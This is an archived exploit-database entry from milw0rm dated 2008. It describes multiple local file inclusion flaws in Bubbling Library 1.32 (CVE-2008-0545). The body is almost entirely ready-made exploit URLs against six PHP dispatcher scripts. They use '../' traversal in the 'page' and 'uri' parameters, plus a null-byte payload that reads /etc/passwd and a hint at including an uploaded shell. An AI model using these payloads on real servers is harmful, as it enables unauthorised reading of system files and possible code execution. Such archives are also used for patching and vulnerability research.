[] NeoSense

Bubbling Library 1.32 - Multiple Local File Inclusions

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-01-25 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-41185;CVE-2008-0545;OSVDB-41184;OSVDB-41183;OSVDB-41182;OSVDB-41181;OSVDB-41180 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combubbling.library.v1.32.zip

## bubbling library v1.32   multiple Local File Inclusion Vulnerabilities
## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : v.4@hotmail.fr

## Home : http://www.v4-team.com
## for execute exploit does not write extention of file
## Other files:    =../../../../etc/passwd%00
## exploit :
#
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]
# examples/dispatcher/framework/simple.php?page=/home/user/shell
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]

Greetz :  H-T Team , v4 Team  , Tryag , no-hack all my friend
Special tnx for : Houssamix
thx for: Proamk  - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke

# milw0rm.com [2008-01-26]